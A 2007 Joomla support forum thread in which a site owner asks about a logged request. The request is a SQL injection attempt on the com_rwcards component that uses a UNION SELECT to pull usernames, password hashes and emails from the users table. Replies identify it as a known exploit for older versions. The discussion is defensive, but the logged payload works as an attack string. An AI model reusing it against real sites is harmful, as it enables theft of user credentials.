Change font size Change Width
Advanced Search
 

Joomla! Discussion Forums



It is currently Tue Nov 24, 2009 9:41 am (All times are UTC )

 

Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x

Forum rules

Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  Page 1 of 1
  [ 3 posts ] 
  Print view Previous topic | Next topic 
Author Message
snadowitz
Posted: Tue Oct 30, 2007 3:50 pm 
User avatar
Joomla! Guru
Joomla! Guru
Offline

Joined: Wed Jan 18, 2006 4:40 am
Posts: 685
Hi - seeing this a lot in my http logging:-

210.73.88.144 - - [30/Oct/2007:08:40:44 -0700] "GET /component/index.php?option=com_rwcards&task=listCards&category_id=-1'union%20select%201,2,03,4,concat(char(117,117,117,117,117,58),username,char(112,112,112,112,112,58),password,char(117,116,121,112,101,58),usertype,char(101,109,97,105,108,58),email,char(101,110,100,117,117,58)),50,044,076,0678,07%20from%20jos_users/* HTTP/1.0" 200 380 "-" "Opera/9.01 (Windows NT 5.0; U; en)"

is this an exploit attempt? a known one? does not seem to have succeeded....I hope

_________________
Snadowitz
Current Projects:-
http://www.thunderbirdink.com/
http://www.starcrossedtattoo.com

Last edited by infograf768 on Tue Oct 30, 2007 4:39 pm, edited 1 time in total.

Top
   
 
Tonie
Posted: Tue Oct 30, 2007 3:57 pm 
User avatar
Joomla! Master
Joomla! Master
Offline

Joined: Thu Aug 18, 2005 7:13 am
Posts: 13246
Search for 'com_rwcards security' on google, there has been an exploit in the past against it.

_________________
Antonie de Wilde - Forum admin
All Joomla! release dates and days between releases: http://jfoobar.org/blog/189-days-betwee ... a-releases.test

Top
   
 
snadowitz
Posted: Tue Oct 30, 2007 4:04 pm 
User avatar
Joomla! Guru
Joomla! Guru
Offline

Joined: Wed Jan 18, 2006 4:40 am
Posts: 685
looks like I got lucky - I use 2.4.4 and not 2.4.3 or earlier which has an sql injection exploit available for it.

_________________
Snadowitz
Current Projects:-
http://www.thunderbirdink.com/
http://www.starcrossedtattoo.com

Top
   
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 3 posts ] 

Quick reply

 


Board index » Joomla! Older Version Support » Joomla! 1.0 » Security - 1.0.x

Who is online

Users browsing this forum: No registered users and 22 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
 
 
 
 
 

© 2005-2009 Open Source Matters, Inc. All rights reserved. Joomla hosting by Rochen Ltd.